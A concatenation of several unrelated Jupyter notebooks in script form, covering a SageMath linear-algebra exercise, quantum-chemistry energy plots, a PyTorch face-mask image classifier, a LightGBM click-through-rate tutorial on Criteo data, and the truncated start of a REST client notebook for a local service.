|
MythBusters.ipynb
|
# -*- coding: utf-8 -*-
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: SageMath 9.0
# language: sage
# name: sagemath
# ---
# # Asignacion a Cargo del Docente (ACD)
#
# This notebook will serve to check the exercises of the _Asignacion a Cargo del Docente_ (instructor-assigned activity) for the _Linear Algebra_ course at _UnADM_.
#
# Use of this material in activities related to _UnADM_ must follow the institution's [code of ethics](https://www.unadmexico.mx/images/descargables/codigo_de_etica_de_estudiantes_de_la_unadm.pdf). For any other purpose, please follow the guidelines laid out in this repository's [readme.md](../../../readme.md) file.
# +
def show(matriz, norm=True, tex=False):
if norm:
print(matriz)
if tex:
print("\n--")
print(latex(matriz))
if norm or tex:
print("\n------\n")
def starrus(mat, py=False):
ret = ""; temp = ""
n = mat.nrows()
for i in range(n):
ret += ("({})*({})*({})".format(mat[i,0],
mat[(i+1)%n, 1],
mat[(i+2)%n, 2]))
temp += ("({})*({})*({})".format(mat[(i+2)%n,0],
mat[(i+1)%n, 1],
mat[(i)%n, 2]))
if i != n-1:
ret += " + "
temp += " + "
ret += "-("
temp += ")"
if py:
return ret+temp
return (ret+temp).replace("*", "")
def extendidaStarrus(mat):
n = mat.nrows()
return latex(Matrix([mat[i%n] for i in range(n+2)]))
def gauss_method(M, rescale_leading_entry=False, tex=False):
num_rows=M.nrows()
num_cols=M.ncols()
show(M, tex=tex)
col = 0 # all cols before this are already done
for row in range(0,num_rows):
# ?Need to swap in a nonzero entry from below
while (col < num_cols
and M[row][col] == 0):
for i in M.nonzero_positions_in_column(col):
if i > row:
                    print(" swap row", row+1, "with row", i+1)
M.swap_rows(row,i)
show(M, tex=tex)
break
else:
col += 1
if col >= num_cols:
break
# Now guaranteed M[row][col] != 0
if (rescale_leading_entry and M[row][col] != 1):
            print(" multiply row", row+1, "by", 1/M[row][col])
M.rescale_row(row,1/M[row][col])
show(M, tex=tex)
change_flag=False
for changed_row in range(row+1,num_rows):
if M[changed_row][col] != 0:
change_flag=True
factor=-1*M[changed_row][col]/M[row][col]
                print(" replace row", changed_row+1,
                      "with", factor,
                      "times row", row+1,
                      "plus row", changed_row+1)
M.add_multiple_of_row(changed_row,row,factor)
if change_flag:
show(M, tex=tex)
col +=1
# -
# ### Exercise 1
#
# Obtain the determinant of matrix A by the _rule of Sarrus_
# $$
# A = \begin{pmatrix}
# 3 & 2 & 1 \\
# 4 &-2 & 2 \\
# 2 & 3 & 1
# \end{pmatrix}
# $$
# +
tex = False
A = Matrix(QQ, [[3,2,1],
[4,-2,2],
[2,3,1]])
show(A, tex=tex)
# -
#print(extendidaStarrus(A))
print(starrus(A))
print((3)*(-2)*(1) + (4)*(3)*(1) + (2)*(2)*(2) -((2)*(-2)*(1) + (3)*(3)*(2) + (4)*(2)*(1)))
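The hand-expanded Sarrus products above can be cross-checked numerically; a quick sketch (assuming NumPy is available alongside Sage):

```python
import numpy as np

# Cross-check the Sarrus expansion against NumPy's determinant
A = np.array([[3, 2, 1],
              [4, -2, 2],
              [2, 3, 1]])
print(round(np.linalg.det(A)))  # -8
```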
# ## Exercise 2
# Compute $A + B$ for the matrices
# $$
# A = \begin{pmatrix}
# 3 & 4 & 1 \\ 5 & 3 & 1 \\ 2 & 3 & 1
# \end{pmatrix},
# B = \begin{pmatrix}
# -2 & -3 & -1 \\ 4 & 3 & 2 \\ 10 & 4 & 2
# \end{pmatrix}
# $$
# +
A = Matrix(QQ, [[3,4,1],[5,3,1],[2,3,1]])
B = Matrix(QQ, [[-2,-3,-1],[4,3,2],[10,4,2]])
show(A, tex=tex)
show(B, tex=tex)
# -
show(A + B, tex=tex)
# ## Exercise 3
# Solve the following system of equations by __Gaussian elimination__
#
# $$
# \begin{eqnarray*}
# 3x + 2y + 2z &=& 10 \\
# 2x + 3y + z &=& 8 \\
# 3x + y + 5z &=& 11
# \end{eqnarray*}
# $$
# +
eq = Matrix(QQ, [[3,2,2,10],[2,3,1,8],[3,1,5,11]])
gauss_method(eq)
print(eq[:,:3]**(-1)*eq[:,3])
# -
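As a sanity check outside Sage, the same system can be solved with NumPy (a sketch, assuming NumPy is available):

```python
import numpy as np

# Coefficients and right-hand side of the system above
A = np.array([[3, 2, 2],
              [2, 3, 1],
              [3, 1, 5]], dtype=float)
b = np.array([10, 8, 11], dtype=float)
x = np.linalg.solve(A, b)
print(x)  # x = 16/7, y = 13/14, z = 9/14
```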
|
B1-1/BALI/Actividades/BALI_Z_BERC.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# %pip install plotly==4.5.0
import numpy as np
import plotly.graph_objects as go
import matplotlib.pyplot as plt
fig = go.Figure(data=[go.Table(
header=dict(values=['Theory Level', 'Total Energy (a.u.)', 'Total Energy (kJ/mol)'],
fill_color='cornsilk'),
cells=dict(values=[['HF/STO-3G', 'HF/3-21G*', 'HF/6-31G**', 'B3LYP/3-21G*','B3LYP/6-31G**','B3LYP/DGDZVP'], [-39.7268636588, -39.9768775238, -40.2017045054, -40.3015924400, -40.5240140496,-40.5233611883], [-104302.888481552,-104959.299934112,-105549.583219269,-105811.839011538,-106395.806992028,-106394.092904554]], fill_color='azure'))])
fig.show()
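The kJ/mol column is just the atomic-unit energies scaled by the Hartree-to-kJ/mol conversion factor; a quick sketch (the factor below is the CODATA value, an assumption about how the table was produced, so the last digits differ slightly):

```python
HARTREE_TO_KJ_PER_MOL = 2625.4996  # CODATA: 1 hartree ≈ 2625.4996 kJ/mol

e_au = -39.7268636588  # HF/STO-3G total energy in a.u. from the table
e_kj = e_au * HARTREE_TO_KJ_PER_MOL
print(e_kj)  # ≈ -104302.86 kJ/mol, matching the table's -104302.888 to within the factor's precision
```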
# +
HF_Basis=('STO-3G','3-21G*','6-31G**')
HF_times=(9.1, 15.3, 15.7)
B3LYP_Basis=('3-21G*','6-31G**','DGDZVP')
B3LYP_times=(25.0, 33.6, 27.6)
fig, (ax1, ax2)= plt.subplots(1,2, figsize=(15,5))
ax1.bar(HF_Basis, HF_times, color='darkslateblue')
ax1.set_title('HF')
ax1.set_ylabel('CPU Time (s)')
ax1.set_ylim((0,35))
ax2.bar(B3LYP_Basis,B3LYP_times, color='mediumaquamarine')
ax2.set_ylabel('CPU Time (s)')
ax2.set_title('B3LYP')
# -
|
W3/Nida_HW3.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: 'Python 3.8.5 64-bit (''base'': conda)'
# name: python3
# ---
# +
import csv
import glob
import pandas as pd
import numpy as np
import PIL
import cv2
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.utils.data import Dataset
from torch.utils.data.dataloader import DataLoader
import timm
import albumentations as A
from albumentations.pytorch import ToTensorV2
from sklearn.model_selection import train_test_split
from tqdm import tqdm
import copy
import os
import wandb
import time
# -
# # 1. Load the data
train_dir = '../../input/data/train'
test_dir = '../../input/data/eval'
save_dir = '../saved/models/'
# ### Hyperparameters
# +
#model_name = 'efficientnet_b1'
model_name = 'vit_base_patch16_384'
learning_rate = 2e-5
batch_size = 16
step_size = 5
epochs = 15
earlystop = 5
A_transform = {
'train':
A.Compose([
A.Resize(512, 512),
A.RandomCrop(384, 384),
# A.Resize(224, 224),
A.HorizontalFlip(p=0.5),
A.Cutout(num_holes=8, max_h_size=32,max_w_size=32),
A.ElasticTransform(),
A.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
ToTensorV2()
]),
'valid':
A.Compose([
A.Resize(384, 384),
# A.Resize(224, 224),
A.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
ToTensorV2()
]),
'test':
A.Compose([
A.Resize(384, 384),
# A.Resize(224, 224),
A.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
ToTensorV2()
])
}
# +
class LoadCSV():
def __init__(self, dir):
self.dir = dir
self.img_dir =train_dir + '/new_images/'
self.origin_csv_path = train_dir + '/train.csv'
self.trans_csv_path = train_dir + '/trans_train.csv'
if not os.path.exists(self.trans_csv_path):
self._makeCSV()
self.df = pd.read_csv(self.trans_csv_path)
#self.df = self.df[:200]
def _makeCSV(self):
with open(self.trans_csv_path, 'w', newline='') as f:
writer = csv.writer(f)
writer.writerow(["path", "label"])
df = pd.read_csv(self.origin_csv_path)
for idx in range(len(df)):
data = df.iloc[idx]
img_path_base = os.path.join(os.path.join(self.img_dir, data['path']), '*')
                for img_path in glob.glob(img_path_base):
                    label = 0
                    if "incorrect" in img_path:
                        label += 6
                    elif 'normal' in img_path:
                        label += 12
                    # gender and age are independent of the mask state, so they are
                    # added on top rather than chained with elif (otherwise most of
                    # the 18 classes could never be produced)
                    if data['gender'] == 'female':
                        label += 3
                    if data['age'] >= 30 and data['age'] < 60:
                        label += 1
                    elif data['age'] >= 60:
                        label += 2
                    writer.writerow([img_path, label])
f.close()
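The 18-class scheme (3 mask states × 2 genders × 3 age bands) amounts to the arithmetic `mask_idx*6 + gender_idx*3 + age_idx`; a hypothetical standalone sketch of that encoding (the function name is mine, not part of the original code):

```python
def encode_label(mask_type, gender, age):
    # mask_type: "mask" (worn correctly), "incorrect", or "normal" (no mask)
    mask_idx = {"mask": 0, "incorrect": 1, "normal": 2}[mask_type]
    gender_idx = 0 if gender == "male" else 1
    age_idx = 0 if age < 30 else (1 if age < 60 else 2)
    return mask_idx * 6 + gender_idx * 3 + age_idx

print(encode_label("incorrect", "female", 45))  # 6 + 3 + 1 = 10
```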
class MaskDataset(Dataset):
def __init__(self, dataframe, transform=None):
super().__init__()
self.df = dataframe
self.transform = transform
def __len__(self):
return len(self.df)
def __getitem__(self, idx):
class_id = torch.tensor(self.df['label'].iloc[idx])
img = PIL.Image.open(self.df['path'].iloc[idx])
img = np.array(img.convert("RGB"))
if self.transform:
img = self.transform(image=img)['image']
return img, class_id
# -
# # 2. Model definition
#
class MyModel(nn.Module):
def __init__(self, model_name, num_classes):
super(MyModel, self).__init__()
self.num_classes = num_classes
self.model = timm.create_model(model_name, pretrained=True)
# n_features = self.model.classifier.in_features
# self.model.classifier = torch.nn.Linear(in_features=n_features, out_features=num_classes, bias=True)
# torch.nn.init.xavier_uniform_(self.model.classifier.weight)
# stdv = 1/np.sqrt(self.num_classes)
# self.model.classifier.bias.data.uniform_(-stdv, stdv)
n_features = self.model.head.in_features
self.model.head = torch.nn.Linear(in_features=n_features, out_features=self.num_classes, bias=True)
torch.nn.init.xavier_uniform_(self.model.head.weight)
stdv = 1/np.sqrt(self.num_classes)
self.model.head.bias.data.uniform_(-stdv, stdv)
def forward(self, x):
return self.model(x)
# +
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
model = MyModel(model_name, 18).to(device)  # must exist before the optimizer is built
criterion = nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(model.parameters(), learning_rate)
lr_scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=50, eta_min=0)
# -
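A quick sketch of the formula behind `CosineAnnealingLR` with the settings above (pure Python, so this shows the schedule's shape rather than the PyTorch object itself):

```python
import math

def cosine_lr(epoch, base_lr=2e-5, t_max=50, eta_min=0.0):
    # eta_min + (base_lr - eta_min) * (1 + cos(pi * t / T_max)) / 2
    return eta_min + 0.5 * (base_lr - eta_min) * (1 + math.cos(math.pi * epoch / t_max))

# learning rate decays from 2e-5 at epoch 0 to eta_min at epoch T_max
for e in (0, 25, 50):
    print(e, cosine_lr(e))
```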
# # 3. Training
today = time.strftime('%Y%m%d_%H%M%S', time.localtime(time.time()))
if not os.path.exists(save_dir + today):
os.makedirs(save_dir + today)
# +
from sklearn.model_selection import StratifiedKFold
mask_csv = LoadCSV(train_dir)
kfold = StratifiedKFold(n_splits=5, shuffle=False)
for fold, (train_idx, valid_idx) in enumerate(kfold.split(mask_csv.df['path'], mask_csv.df['label'])):
print(f'FOLD {fold}')
mask_train = MaskDataset(mask_csv.df, transform=A_transform['train'])
train_subsampler = torch.utils.data.SubsetRandomSampler(train_idx)
valid_subsampler = torch.utils.data.SubsetRandomSampler(valid_idx)
train_loader = DataLoader(mask_train, batch_size=batch_size, sampler=train_subsampler, drop_last=False, num_workers=8, pin_memory=True)
valid_loader = DataLoader(mask_train, batch_size=batch_size, sampler=valid_subsampler, drop_last=False, num_workers=8, pin_memory=True)
dataloaders = {'train': train_loader, 'valid':valid_loader}
    model = MyModel(model_name, 18).to(device)
    # re-create the optimizer and scheduler so they track this fold's new model
    optimizer = torch.optim.Adam(model.parameters(), learning_rate)
    lr_scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=50, eta_min=0)
    earlystop_value = 0
    best_acc = 0
    best_loss = float('inf')
    best_model = copy.deepcopy(model.state_dict())
for epoch in range(epochs):
if earlystop_value >= earlystop:
break
train_loss, valid_loss, train_acc_list, valid_acc_list = 0, 0, [],[]
for phase in ['train', 'valid']:
if phase == 'train':
model.train()
else:
model.eval()
running_loss = 0.0
running_corrects = 0
with tqdm(dataloaders[phase], total=dataloaders[phase].__len__(), unit="batch") as train_bar:
for inputs, labels in train_bar:
train_bar.set_description(f"{phase} Epoch {epoch} ")
inputs, labels = inputs.to(device), labels.to(device)
optimizer.zero_grad()
outputs = model(inputs)
loss = criterion(outputs, labels)
if phase == 'train':
loss.backward()
optimizer.step()
outputs = outputs.cpu().detach().numpy()
labels = labels.cpu().detach().numpy()
running_loss += loss.item() * inputs.size(0)
running_corrects += (np.argmax(outputs, axis=1)== labels).mean()
epoch_loss = running_loss / len(dataloaders[phase].dataset)
epoch_acc = running_corrects / len(dataloaders[phase].dataset)
train_bar.set_postfix(loss=epoch_loss, acc=epoch_acc)
lr_scheduler.step()
if phase=='valid':
if epoch_loss < best_loss:
best_loss = epoch_loss
best_model_wts = copy.deepcopy(model.state_dict())
torch.save(best_model_wts, f'{save_dir}{today}/baseline_{model_name}_lr{learning_rate}_stepLR{step_size}_batch{batch_size}_kfold{fold}_epoch{epoch}_valid_loss_{epoch_loss:.5f}.pt')
earlystop_value = 0
else:
earlystop_value += 1
# -
# # 4. Inference
class TestDataset(Dataset):
def __init__(self, img_paths, transform):
self.img_paths = img_paths
self.transform = transform
def __getitem__(self, index):
image = PIL.Image.open(self.img_paths[index])
image = np.array(image.convert("RGB"))
if self.transform:
image = self.transform(image=image)
image = image['image']
return image
def __len__(self):
return len(self.img_paths)
# +
submission = pd.read_csv(os.path.join(test_dir, 'info.csv'))
image_dir = os.path.join(test_dir, 'new_images')
image_paths = [os.path.join(image_dir, img_id) for img_id in submission.ImageID]
dataset = TestDataset(image_paths, A_transform['test'])
test_loader = DataLoader(dataset, batch_size=batch_size, shuffle=False)
model.eval()
all_predictions = []
with tqdm(test_loader, total=test_loader.__len__(), unit="batch") as test_bar:
for images in test_bar:
with torch.no_grad():
images = images.to(device)
pred = model(images)
pred = pred.argmax(dim=-1)
all_predictions.extend(pred.cpu().numpy())
submission['ans'] = all_predictions
submission.to_csv(os.path.join(test_dir, 'submission.csv'), index=False)
print('test inference is done!')
# +
import numpy as np
import torch.nn.functional as F
model_num1=MyModel('efficientnet_b3', 18).to(device)
model_num1.load_state_dict(torch.load('/opt/ml/image-classification-level1-04/saved/models/PretrainModelTimm_NoOversampling_Cutout_Elastic_CLAHE_Cutmix_Transform_input_224/0831_204359/model_best.pth')['state_dict'])
model_num2 = MyModel(model_name, 18).to(device)
model_num2.load_state_dict(torch.load('saved/models/20210901_022127/baseline_efficientnet_b1_lr1e-05_stepLR5_kfoldStratifiedKFold(n_splits=5, random_state=None, shuffle=False)_batch16_epoch1_valid_loss_0.46484.pt'))
submission = pd.read_csv(os.path.join(test_dir, 'info.csv'))
image_dir = os.path.join(test_dir, 'images')
image_paths = [os.path.join(image_dir, img_id) for img_id in submission.ImageID]
dataset = TestDataset(image_paths[:200], A_transform['test'])
test_loader = DataLoader(dataset, batch_size=batch_size, shuffle=False)
best_models=[model_num1,model_num2]
prediction_array=np.zeros((12600,18))
ratio=[0.6,0.4]
for i,model in enumerate(best_models):
idx=0
with tqdm(test_loader, total=test_loader.__len__(), unit="batch") as test_bar:
for images in test_bar:
with torch.no_grad():
predictions_list = []
images = images.to(device)
pred = model(images)
pred=F.softmax(pred,dim=-1)
pred=pred*ratio[i]
#pred = pred.argmax(dim=-1)
pred = pred.tolist()
batch_idx = batch_size * idx
#print('pred',pred)
                # images.shape[0] is 64, i.e. fill in only one batch's worth of rows at a time
if (idx+1) == len(test_loader):
prediction_array[batch_idx:batch_idx + 8,:] = pred
predictions_list.append(prediction_array[...,np.newaxis])
else :
prediction_array[batch_idx: batch_idx + 16, :] = pred
predictions_list.append(prediction_array[..., np.newaxis])
idx+=1
print(predictions_list[-1][-16:])
# for i in range(200):
# print(predictions_list[-1][i])
# mean over axis = 2
#predictions_array = np.concatenate(predictions_list, axis = 1)
#predictions_mean = predictions_array.sum(axis = 1)
# 1 if the mean is greater than 0.5, else 0
#print(predictions_mean)
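The cell above implements weighted soft voting; stripped of the batching bookkeeping, the idea is simply a weighted sum of each model's softmax outputs (the probabilities and weights below are hypothetical, with the same 0.6/0.4 split as above):

```python
import numpy as np

# Hypothetical per-model class probabilities for a single sample
probs_a = np.array([[0.7, 0.2, 0.1]])   # model 1 (weight 0.6)
probs_b = np.array([[0.4, 0.5, 0.1]])   # model 2 (weight 0.4)

ensembled = 0.6 * probs_a + 0.4 * probs_b
print(ensembled)
print(ensembled.argmax(axis=1))  # [0]
```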
|
jupyter/baseline kfold.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python (reco_bare)
# language: python
# name: reco_bare
# ---
# <i>Copyright (c) Microsoft Corporation. All rights reserved.</i>
#
# <i>Licensed under the MIT License.</i>
# # LightGBM: A Highly Efficient Gradient Boosting Decision Tree
# This notebook will give you an example of how to train a LightGBM model to estimate click-through rates on an e-commerce advertisement. We will train a LightGBM based model on the Criteo dataset.
#
# LightGBM \[1\] is a gradient boosting framework that uses tree-based learning algorithms. It is designed to be distributed and efficient with the following advantages:
# * Fast training speed and high efficiency.
# * Low memory usage.
# * Great accuracy.
# * Support of parallel and GPU learning.
# * Capable of handling large-scale data.
# ## Global Settings and Imports
# +
import sys, os
sys.path.append("../../")
import lightgbm as lgb
import papermill as pm
import pandas as pd
import category_encoders as ce
from tempfile import TemporaryDirectory
import reco_utils.recommender.lightgbm.lightgbm_utils as lgb_utils
import reco_utils.dataset.criteo as criteo
print("System version: {}".format(sys.version))
print("LightGBM version: {}".format(lgb.__version__))
# -
# ### Parameter Setting
# Let's set the main parameters for LightGBM now. Basically, the task is binary classification (predicting click or no click), so the objective function is set to binary log loss, and AUC is used as the evaluation metric since it is less affected by class imbalance in the dataset.
#
# Generally, we can adjust the number of leaves (MAX_LEAF), the minimum number of data in each leaf (MIN_DATA), maximum number of trees (NUM_OF_TREES), the learning rate of trees (TREE_LEARNING_RATE) and EARLY_STOPPING_ROUNDS (to avoid overfitting) in the model to get better performance.
#
# Besides, we can also adjust some other listed parameters in the following to optimize the results, which are shown in [5] concretely.
# + tags=["parameters"]
MAX_LEAF = 64
MIN_DATA = 20
NUM_OF_TREES = 100
TREE_LEARNING_RATE = 0.15
EARLY_STOPPING_ROUNDS = 20
METRIC = "auc"
SIZE = "sample"
# -
params = {
'task': 'train',
'boosting_type': 'gbdt',
'num_class': 1,
'objective': "binary",
'metric': METRIC,
'num_leaves': MAX_LEAF,
'min_data': MIN_DATA,
'boost_from_average': True,
#set it according to your cpu cores.
'num_threads': 20,
'feature_fraction': 0.8,
'learning_rate': TREE_LEARNING_RATE,
}
# ## Data Preparation
# Here we use CSV format as the example data input. Our example data is a sample (about 100 thousand rows) from the Criteo dataset [2]. The Criteo dataset is a well-known industry benchmark for developing CTR prediction models, and it is frequently adopted as an evaluation dataset in research papers. The original dataset is too large for a lightweight demo, so we sample a small portion of it as a demo dataset. <br>
# Specifically, there are 39 feature columns in Criteo: 13 numerical features (I1-I13) and 26 categorical features (C1-C26).
# +
nume_cols = ["I" + str(i) for i in range(1, 14)]
cate_cols = ["C" + str(i) for i in range(1, 27)]
label_col = "Label"
header = [label_col] + nume_cols + cate_cols
with TemporaryDirectory() as tmp:
all_data = criteo.load_pandas_df(size=SIZE, local_cache_path=tmp, header=header)
display(all_data.head())
# -
# First, we split the data into three sets: train_data (first 80%), valid_data (middle 10%) and test_data (last 10%). <br>
# Notably, since Criteo is a kind of time-series streaming data, which is also very common in recommendation scenarios, we split the data in its original order.
# split data into 3 sets, preserving the original order
length = len(all_data)
train_data = all_data.iloc[:int(0.8 * length)]
valid_data = all_data.iloc[int(0.8 * length):int(0.9 * length)]
test_data = all_data.iloc[int(0.9 * length):]
# ## Basic Usage
# ### Ordinal Encoding
# Since LightGBM can handle low-frequency features and missing values by itself, for basic usage we only encode the string-like categorical features with an ordinal encoder.
# +
ord_encoder = ce.ordinal.OrdinalEncoder(cols=cate_cols)
def encode_csv(df, encoder, label_col, typ='fit'):
if typ == 'fit':
df = encoder.fit_transform(df)
else:
df = encoder.transform(df)
y = df[label_col].values
del df[label_col]
return df, y
train_x, train_y = encode_csv(train_data, ord_encoder, label_col)
valid_x, valid_y = encode_csv(valid_data, ord_encoder, label_col, 'transform')
test_x, test_y = encode_csv(test_data, ord_encoder, label_col, 'transform')
print('Train Data Shape: X: {trn_x_shape}; Y: {trn_y_shape}.\nValid Data Shape: X: {vld_x_shape}; Y: {vld_y_shape}.\nTest Data Shape: X: {tst_x_shape}; Y: {tst_y_shape}.\n'
.format(trn_x_shape=train_x.shape,
trn_y_shape=train_y.shape,
vld_x_shape=valid_x.shape,
vld_y_shape=valid_y.shape,
tst_x_shape=test_x.shape,
tst_y_shape=test_y.shape,))
# -
# ### Create model
# When both hyper-parameters and data are ready, we can create a model:
lgb_train = lgb.Dataset(train_x, train_y.reshape(-1), params=params, categorical_feature=cate_cols)
lgb_valid = lgb.Dataset(valid_x, valid_y.reshape(-1), reference=lgb_train, categorical_feature=cate_cols)
lgb_test = lgb.Dataset(test_x, test_y.reshape(-1), reference=lgb_train, categorical_feature=cate_cols)
lgb_model = lgb.train(params,
lgb_train,
num_boost_round=NUM_OF_TREES,
early_stopping_rounds=EARLY_STOPPING_ROUNDS,
valid_sets=lgb_valid,
categorical_feature=cate_cols)
# Now let's see what is the model's performance:
test_preds = lgb_model.predict(test_x)
res_basic = lgb_utils.cal_metric(test_y.reshape(-1), test_preds, ['auc','logloss'])
print(res_basic)
pm.record("res_basic", res_basic)
# <script type="text/javascript" src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=default"></script>
# ## Optimized Usage
# ### Label-encoding and Binary-encoding
# Next, since LightGBM handles dense numerical features more effectively, we try to convert all the categorical features in the original data into numerical ones, by label-encoding [3] and binary-encoding [4]. Also, due to the sequential nature of Criteo, the label-encoding we adopt is executed one-by-one: we encode the samples in order, using only the information from the samples that precede each one (sequential label-encoding and sequential count-encoding). Besides, we also filter out low-frequency categorical features and fill missing values for the numerical features with the mean of the corresponding column (see `lgb_utils.NumEncoder`).
#
# Specifically, in `lgb_utils.NumEncoder`, the main steps are as follows.
# * Firstly, we convert the low-frequency categorical features to "LESS" and the missing categorical features to "UNK".
# * Secondly, we convert the missing numerical features into the mean of corresponding columns.
# * Thirdly, the string-like categorical features are ordinal encoded like the example shown in basic usage.
# * And then, we target encode the categorical features in the samples order one-by-one. For each sample, we add the label and count information of its former samples into the data and produce new features. Formally, for $i=1,2,...,n$, we add $\frac{\sum\nolimits_{j=1}^{i-1} I(x_j=c) \cdot y}{\sum\nolimits_{j=1}^{i-1} I(x_j=c)}$ as a new label feature for current sample $x_i$, where $c$ is a category to encode in current sample, so $(i-1)$ is the number of former samples, and $I(\cdot)$ is the indicator function that check the former samples contain $c$ (whether $x_j=c$) or not. At the meantime, we also add the count frequency of $c$, which is $\frac{\sum\nolimits_{j=1}^{i-1} I(x_j=c)}{i-1}$, as a new count feature.
# * Finally, based on the results of ordinal encoding, we add the binary encoding results as new columns into the data.
#
# Note that the statistics used in the above process only updates when fitting the training set, while maintaining static when transforming the testing set because the label of test data should be considered as unknown.
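A minimal pure-Python sketch of the sequential label/count encoding described above, for a single hypothetical categorical column — this mimics the idea behind `lgb_utils.NumEncoder`, not its actual implementation:

```python
cats = ["a", "b", "a", "a", "b"]   # a single hypothetical categorical column
ys = [1, 0, 0, 1, 1]               # binary labels

label_enc, count_enc = [], []
seen = {}  # category -> (count so far, label sum so far)
for i, (c, y) in enumerate(zip(cats, ys)):
    cnt, s = seen.get(c, (0, 0))
    label_enc.append(s / cnt if cnt else 0.0)  # mean label of earlier occurrences
    count_enc.append(cnt / i if i else 0.0)    # frequency among earlier samples
    seen[c] = (cnt + 1, s + y)

print(label_enc)  # [0.0, 0.0, 1.0, 0.5, 0.0]
print(count_enc)  # [0.0, 0.0, 0.5, 0.6666666666666666, 0.25]
```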
label_col = 'Label'
num_encoder = lgb_utils.NumEncoder(cate_cols, nume_cols, label_col)
train_x, train_y = num_encoder.fit_transform(train_data)
valid_x, valid_y = num_encoder.transform(valid_data)
test_x, test_y = num_encoder.transform(test_data)
del num_encoder
print('Train Data Shape: X: {trn_x_shape}; Y: {trn_y_shape}.\nValid Data Shape: X: {vld_x_shape}; Y: {vld_y_shape}.\nTest Data Shape: X: {tst_x_shape}; Y: {tst_y_shape}.\n'
.format(trn_x_shape=train_x.shape,
trn_y_shape=train_y.shape,
vld_x_shape=valid_x.shape,
vld_y_shape=valid_y.shape,
tst_x_shape=test_x.shape,
tst_y_shape=test_y.shape,))
# ### Training and Evaluation
lgb_train = lgb.Dataset(train_x, train_y.reshape(-1), params=params)
lgb_valid = lgb.Dataset(valid_x, valid_y.reshape(-1), reference=lgb_train)
lgb_model = lgb.train(params,
lgb_train,
num_boost_round=NUM_OF_TREES,
early_stopping_rounds=EARLY_STOPPING_ROUNDS,
valid_sets=lgb_valid)
test_preds = lgb_model.predict(test_x)
res_optim = lgb_utils.cal_metric(test_y.reshape(-1), test_preds, ['auc','logloss'])
print(res_optim)
pm.record("res_optim", res_optim)
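The two metrics above follow the standard definitions; as a self-contained sketch (a simplified stand-in for `lgb_utils.cal_metric`, not its actual implementation), they can be computed as:

```python
import math

def cal_metric_sketch(y_true, y_pred):
    """Compute AUC and logloss from binary labels and predicted probabilities."""
    eps = 1e-15  # clip probabilities away from 0/1 to keep log() finite
    logloss = -sum(y * math.log(max(p, eps)) + (1 - y) * math.log(max(1 - p, eps))
                   for y, p in zip(y_true, y_pred)) / len(y_true)
    # AUC as the probability that a positive sample outranks a negative one
    pos = [p for y, p in zip(y_true, y_pred) if y == 1]
    neg = [p for y, p in zip(y_true, y_pred) if y == 0]
    wins = sum((pp > pn) + 0.5 * (pp == pn) for pp in pos for pn in neg)
    return {"auc": wins / (len(pos) * len(neg)), "logloss": logloss}
```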
# ## Model saving and loading
# Now we finish the basic training and testing for LightGBM, next let's try to save and reload the model, and then evaluate it again.
# +
with TemporaryDirectory() as tmp:
save_file = os.path.join(tmp, r'finished.model')
lgb_model.save_model(save_file)
loaded_model = lgb.Booster(model_file=save_file)
# eval the performance again
test_preds = loaded_model.predict(test_x)
print(lgb_utils.cal_metric(test_y.reshape(-1), test_preds, ['auc','logloss']))
# -
# ## Reference
# \[1\] <NAME>, <NAME>, <NAME>, <NAME>, <NAME>, <NAME>, <NAME>, and <NAME>. 2017. LightGBM: A highly efficient gradient boosting decision tree. In Advances in Neural Information Processing Systems. 3146–3154.<br>
# \[2\] The Criteo datasets: http://labs.criteo.com/wp-content/uploads/2015/04/dac_sample.tar.gz .<br>
# \[3\] <NAME>, <NAME>, and <NAME>. 2018. CatBoost: gradient boosting with categorical features support. arXiv preprint arXiv:1810.11363 (2018).<br>
# \[4\] Scikit-learn. 2018. categorical_encoding. https://github.com/scikit-learn-contrib/categorical-encoding .<br>
# \[5\] The parameters of LightGBM: https://github.com/Microsoft/LightGBM/blob/master/docs/Parameters.rst .
|
notebooks/00_quick_start/lightgbm_tinycriteo.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Import libraries, define const values, and set URLs path
# Set the root address (REST_API_ADDRESS) based on your Docker exposed port
# +
import json
import folium
from geopandas import GeoDataFrame
from pysal.viz.mapclassify import Natural_Breaks
import requests
id_field = 'id'
value_field = 'score'
num_bins = 4
fill_color = 'YlOrRd'
fill_opacity = 0.9
# REST URL
REST_API_ADDRESS = 'http://localhost:4646/'
Alive_URL = REST_API_ADDRESS + 'alive'
BRS_URL = REST_API_ADDRESS + 'BRS'
RemoveTables_URL=REST_API_ADDRESS + 'removeTables'
Flush_URL = REST_API_ADDRESS + 'flushBuffer'
ChangeProteus_URL = REST_API_ADDRESS + 'changeProteus'
ChangeAlgo_URL = REST_API_ADDRESS + 'changeAlgo'
ChangeMemorySize_URL = REST_API_ADDRESS + 'changeMemorySize'
# -
# ## Check BRS is alive
# Check the status of BRS
response = requests.get(Alive_URL)
print(response.text)
# ## Set Proteus credential
# Set the Proteus credentials. BRS needs this information to fetch tables.
ProteusURL=""
ProteusUsername=""
ProteusPassword=""
data={'url' : ProteusURL, 'username' : ProteusUsername, 'pass':ProteusPassword}
response = requests.get(ChangeProteus_URL,params=data)
print(response.text)
# ## Change algorithm
